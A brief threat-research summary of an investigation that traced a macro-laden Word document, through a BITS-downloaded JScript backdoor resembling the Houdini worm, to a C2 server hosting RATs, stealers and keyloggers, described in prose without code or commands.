Investigation into a suspicious Word document led Positive Technologies researchers to various malware hosted on extensive network infrastructure and, ultimately, the attacker behind the malicious activity. The initial analyzed file was a Word document containing a malicious macro that leverages the BITS PowerShell cmdlet to download and run a JScript file from a remote server. Pivoting off of the JScript file, various RTF, LNK, and Word samples were found using either the BITS PowerShell cmdlet or bitsadmin to download and execute the same payload. This JScript file was identified to be a WSH backdoor similar to the Houdini worm. After connecting to the C2 server and sending basic system information via HTTP POST requests, the victim host receives backdoor commands such as downloading and uploading files, stealing clipboard contents, and running commands. Reviewing the C2 server leveraged by this backdoor led to the discovery of a large number of malicious files. Included were a Houdini variant, a lightweight Java backdoor, a PowerShell Chrome stealer, a PowerShell keylogger, WebBrowserPassView, the NetWire RAT, TCP Listener, xRAT, and a server-side panel/builder for the aforementioned JScript backdoor.
Exposure of sensitive information